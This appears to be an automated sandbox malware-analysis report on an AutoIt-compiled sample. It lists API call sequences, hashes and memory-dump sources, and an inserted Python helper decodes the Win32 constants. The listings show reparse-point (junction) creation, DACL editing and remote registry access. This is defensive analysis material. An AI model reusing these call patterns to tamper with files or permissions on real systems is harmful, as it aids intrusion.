                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 618562835-2268648507
                                                                            • Opcode ID: 369ec264d691820e54eb324ebca2d6f3882724d7446512d03457f713095d3ed5
                                                                            • Instruction ID: d75e157e633aed5f431d4419410f58a62245bc4db975ea3c1d2b310d8b1b3598
                                                                            • Opcode Fuzzy Hash: 369ec264d691820e54eb324ebca2d6f3882724d7446512d03457f713095d3ed5
                                                                            • Instruction Fuzzy Hash: 68413E72801219AACF16FBE0DDA6DEFB778AF14344F500165F6057A0D2EA746F09CBA0
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0034D0D8
                                                                            • __swprintf.LIBCMT ref: 0034D0FA
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0034D137
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0034D15C
                                                                            • _memset.LIBCMT ref: 0034D17B
                                                                            • _wcsncpy.LIBCMT ref: 0034D1B7
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0034D1EC
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0034D1F7
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0034D200
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0034D20A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: d38e9a392c0e4320f138ecc97430f40c39d76b0ee7816dad342c7e0da27bf335
                                                                            • Instruction ID: 0f5ed60184cd57e85ab132ca6cf524da2c59acabe4d80f104ee1919abd3e365b
                                                                            • Opcode Fuzzy Hash: d38e9a392c0e4320f138ecc97430f40c39d76b0ee7816dad342c7e0da27bf335
                                                                            • Instruction Fuzzy Hash: 5F3183B6500219ABDB22DFA4DC49FEB77BCEF89740F1040B6F509D61A1E770E6458B24
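                                                                             The two listings above (LoadLibraryExW / LoadImageW at 0036E5AB..0036E607 and CreateFileW / DeviceIoControl at 0034D15C..0034D1EC) show only raw numeric arguments. The Python below is an added example for decoding those constants while reading the report; it is not code from the sample, from the AutoIt runtime or from Joe Sandbox. The lookup tables hold documented Win32 values, the helper names are the example's own, and the inputs in explain_listings() are copied from the listing's argument columns. Decoded, the second listing is GENERIC_WRITE on a handle opened with FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, followed by FSCTL_SET_REPARSE_POINT (0x900A4) with a "\??\" target: the standard call sequence for setting an NTFS reparse point (junction or symlink) on the directory just created, with RemoveDirectoryW available to undo it. In the first listing, 0x32 maps the DLL as a data file / image resource, so its entry point never runs and only its icon resources are read.

```python
"""Decode the raw Win32 constants shown in the report's API argument columns.

Added example for reading the two listings above; not code from the sample,
from the AutoIt runtime or from Joe Sandbox. Tables are documented Win32
values (winnt.h, winioctl.h, libloaderapi.h, winuser.h); the inputs in
explain_listings() are copied from the listing lines."""

# Disjoint bit flags / enumerations, keyed by value.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x20000000: "FILE_FLAG_NO_BUFFERING",
              0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
LOAD_LIBRARY_FLAGS = {0x01: "DONT_RESOLVE_DLL_REFERENCES", 0x02: "LOAD_LIBRARY_AS_DATAFILE",
                      0x08: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
                      0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE"}
LOAD_IMAGE_FLAGS = {0x0001: "LR_MONOCHROME", 0x0010: "LR_LOADFROMFILE", 0x0040: "LR_DEFAULTSIZE",
                    0x2000: "LR_CREATEDIBSECTION", 0x8000: "LR_SHARED"}
IMAGE_TYPES = {0: "IMAGE_BITMAP", 1: "IMAGE_ICON", 2: "IMAGE_CURSOR"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Reparse-point FSCTL function numbers on FILE_DEVICE_FILE_SYSTEM (winioctl.h).
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def decode_flags(value, table):
    """Return the names of the bits set in value; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return names


def decode_ioctl(code):
    """Split an I/O control code the way CTL_CODE() builds it:
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    device = code >> 16
    function = (code >> 2) & 0xFFF
    name = FSCTL_FUNCTIONS.get(function) if device == 0x09 else None
    return {"device": DEVICE_TYPES.get(device, hex(device)), "function": function,
            "method": METHODS[code & 0x3], "access": ACCESS[(code >> 14) & 0x3], "name": name}


def decode_createfile(access, share, disposition, flags):
    """Name the four numeric CreateFileW arguments the report prints."""
    return {"access": decode_flags(access, GENERIC_ACCESS),
            "share": decode_flags(share, SHARE_MODE),       # [] means exclusive
            "disposition": DISPOSITION.get(disposition, hex(disposition)),
            "flags": decode_flags(flags, FILE_FLAGS)}


def is_reparse_point_write(createfile, ioctl, target_format):
    """The combination to look for when a sample creates a directory junction or
    symlink: write access to a handle opened on the directory itself
    (BACKUP_SEMANTICS + OPEN_REPARSE_POINT), FSCTL_SET_REPARSE_POINT, and an
    NT-namespace target prefix ("\\??\\")."""
    return ("GENERIC_WRITE" in createfile["access"]
            and {"FILE_FLAG_BACKUP_SEMANTICS", "FILE_FLAG_OPEN_REPARSE_POINT"} <= set(createfile["flags"])
            and ioctl["name"] == "FSCTL_SET_REPARSE_POINT"
            and target_format.startswith("\\??\\"))


def explain_listings():
    """Inputs copied from the listing lines; returns the decoded view."""
    # CreateFileW(?,40000000,00000000,00000000,00000003,02200000,00000000) at 0034D15C
    cf = decode_createfile(0x40000000, 0x0, 3, 0x02200000)
    # DeviceIoControl(00000000,000900A4,...) at 0034D1EC, with the string "\??\%s"
    io = decode_ioctl(0x000900A4)
    # LoadLibraryExW(?,00000000,00000032,...) at 0036E607
    ll = decode_flags(0x32, LOAD_LIBRARY_FLAGS)
    # LoadImageW(00000000,?,00000001,?,?,00002010) at 0036E5AB
    li = (IMAGE_TYPES[1], decode_flags(0x2010, LOAD_IMAGE_FLAGS))
    return {"createfile": cf, "ioctl": io,
            "reparse_write": is_reparse_point_write(cf, io, "\\??\\%s"),
            "loadlibraryex": ll, "loadimage": li}


if __name__ == "__main__":
    for key, value in explain_listings().items():
        print(f"{key}: {value}")
```

                                                                             The tables only need the values that actually occur in this report plus their immediate neighbours; any bit the table does not know is returned as hex rather than silently dropped, so a mis-read constant shows up instead of being explained away.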
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0036BEF4,?,?), ref: 0036E754
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E76B
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E776
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E783
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0036E78C
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E79B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0036E7A4
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E7AB
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E7BC
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0038D9BC,?), ref: 0036E7D5
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0036E7E5
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0036E809
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0036E834
                                                                            • DeleteObject.GDI32(00000000), ref: 0036E85C
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0036E872
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: fd19d5d753f488258734c9222be6cad2531f246459626ef6f565f4e7a454210a
                                                                            • Instruction ID: f12e1e95e077f43bb33e3f4b2a811e0382a9736e8f6b446b23208eaf8b569d66
                                                                            • Opcode Fuzzy Hash: fd19d5d753f488258734c9222be6cad2531f246459626ef6f565f4e7a454210a
                                                                            • Instruction Fuzzy Hash: E8414A75600308EFDB129F65DC88EAA7BBCEF89B21F108498F905D72A0D7309D44DB60
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0035076F
                                                                            • _wcscat.LIBCMT ref: 00350787
                                                                            • _wcscat.LIBCMT ref: 00350799
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003507AE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003507C2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 003507DA
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 003507F4
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: 734cb2449a20a04b8aebb8bf2ac9a3edcb3c157702d58cc36b7f53ca55020aab
                                                                            • Instruction ID: 25965de683a5eb273264ed5eb5f39acd809af2bd9ad8a8bcaba08b56e3fc966e
                                                                            • Opcode Fuzzy Hash: 734cb2449a20a04b8aebb8bf2ac9a3edcb3c157702d58cc36b7f53ca55020aab
                                                                            • Instruction Fuzzy Hash: 258180715043019FCB2ADF64C855D6AB3E8FB88305F15882AFC85DB261E732E9588B92
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0036EF3B
                                                                            • GetFocus.USER32 ref: 0036EF4B
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0036EF56
                                                                            • _memset.LIBCMT ref: 0036F081
                                                                            • GetMenuItemInfoW.USER32 ref: 0036F0AC
                                                                            • GetMenuItemCount.USER32(00000000), ref: 0036F0CC
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0036F0DF
                                                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0036F113
                                                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0036F15B
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0036F193
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0036F1C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: 38c7971f7567e4f3e754631c79188772464c36cb6f2793099bf207121319eb2b
                                                                            • Instruction ID: 5e12f6a5baed31a50d99f2d3012b01e98ba8bfe084953ef3f36a525ed2cbcfe1
                                                                            • Opcode Fuzzy Hash: 38c7971f7567e4f3e754631c79188772464c36cb6f2793099bf207121319eb2b
                                                                            • Instruction Fuzzy Hash: FE81DF75108301EFD712CF14D884A6BBBE8FF8A354F01892EF9949B291D770D905CBA2
                                                                            APIs
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                              • Part of subcall function 0033ABBB: GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                              • Part of subcall function 0033ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                              • Part of subcall function 0033ABBB: HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                              • Part of subcall function 0033AC56: GetProcessHeap.KERNEL32(00000008,0033A6B5,00000000,00000000,?,0033A6B5,?), ref: 0033AC62
                                                                              • Part of subcall function 0033AC56: HeapAlloc.KERNEL32(00000000,?,0033A6B5,?), ref: 0033AC69
                                                                              • Part of subcall function 0033AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0033A6B5,?), ref: 0033AC7A
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0033A8CB
                                                                            • _memset.LIBCMT ref: 0033A8E0
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0033A8FF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A910
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0033A94D
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0033A969
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A986
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0033A995
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0033A99C
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0033A9BD
                                                                            • CopySid.ADVAPI32(00000000), ref: 0033A9C4
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0033A9F5
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0033AA1B
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0033AA2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: bbac707d2a3e96d7c56ac5f437ab60a606a41a0041d735986c9bef3db22bad91
                                                                            • Instruction ID: 696bf0d9987b219aefd604b0692220a8aac95fb06b25aa8c889f8795c8f7e711
                                                                            • Opcode Fuzzy Hash: bbac707d2a3e96d7c56ac5f437ab60a606a41a0041d735986c9bef3db22bad91
                                                                            • Instruction Fuzzy Hash: 12516CB1900609AFDF12DFA4DD85EEEBBB9FF04300F048169F955AB290DB359A05CB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2889450990-2391861430
                                                                            • Opcode ID: 65546725a94869d3ccd5333cfce72cd342f52cf52dd5f2541198f97a6694ae2c
                                                                            • Instruction ID: 13e0238506602230fc7a4051248b41ad1d061f993c05232d00cb57a859cc1c6b
                                                                            • Opcode Fuzzy Hash: 65546725a94869d3ccd5333cfce72cd342f52cf52dd5f2541198f97a6694ae2c
                                                                            • Instruction Fuzzy Hash: F2516A72901119AACF17EBE0DD52EEEB7B8AF09304F100165F5057A0A2EB716F59DF60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2889450990-3420473620
                                                                            • Opcode ID: 537dd6aa1b935bd813c748b818ced45aff11f7bdbccf48261555929b9a1ee14e
                                                                            • Instruction ID: 9e0d548f1d4e87bcbac6ffda4b41da9319797351b52ae064a3a2ec63d1b46ae0
                                                                            • Opcode Fuzzy Hash: 537dd6aa1b935bd813c748b818ced45aff11f7bdbccf48261555929b9a1ee14e
                                                                            • Instruction Fuzzy Hash: 2351AD72801219AACF17EBE0DE52EEEB7B8AF04344F100165F5057A0A2EB746F59DF60
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: $E;$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-200817795
                                                                            • Opcode ID: 13e3e31ef27ec9f9038faf4fabc43f2325cf81f1f6dee0ba9387961a8f6f003a
                                                                            • Instruction ID: 937b53de7d85e20f183e82c05f22c94b6222ac8a756ef0606382f929bc1eadf8
                                                                            • Opcode Fuzzy Hash: 13e3e31ef27ec9f9038faf4fabc43f2325cf81f1f6dee0ba9387961a8f6f003a
                                                                            • Instruction Fuzzy Hash: AB416D3411024B8BDF17EF10DC51AEB3365AF2A344F118815FC551F6AAEB71AE9ACB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003455D7
                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00345664
                                                                            • GetMenuItemCount.USER32(003C1708), ref: 003456ED
                                                                            • DeleteMenu.USER32(003C1708,00000005,00000000,000000F5,?,?), ref: 0034577D
                                                                            • DeleteMenu.USER32(003C1708,00000004,00000000), ref: 00345785
                                                                            • DeleteMenu.USER32(003C1708,00000006,00000000), ref: 0034578D
                                                                            • DeleteMenu.USER32(003C1708,00000003,00000000), ref: 00345795
                                                                            • GetMenuItemCount.USER32(003C1708), ref: 0034579D
                                                                            • SetMenuItemInfoW.USER32(003C1708,00000004,00000000,00000030), ref: 003457D3
                                                                            • GetCursorPos.USER32(?), ref: 003457DD
                                                                            • SetForegroundWindow.USER32(00000000), ref: 003457E6
                                                                            • TrackPopupMenuEx.USER32(003C1708,00000000,?,00000000,00000000,00000000), ref: 003457F9
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00345805
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 3993528054-0
                                                                            • Opcode ID: 8f77e20de1791ad40ecdbf0035d93678a866487ea1d63c75d799a2388563d808
                                                                            • Instruction ID: c47fc51c77116361cd5776e7ada530fab71b1d6f0e27ad2dc5310fe12842dc4b
                                                                            • Opcode Fuzzy Hash: 8f77e20de1791ad40ecdbf0035d93678a866487ea1d63c75d799a2388563d808
                                                                            • Instruction Fuzzy Hash: 53710330A40615BFEB229B14DC49FAABFA9FF01368F254216F6146E1D2C7757C10DB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0033A1DC
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0033A211
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0033A22D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0033A249
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0033A273
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0033A29B
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0033A2A6
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0033A2AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
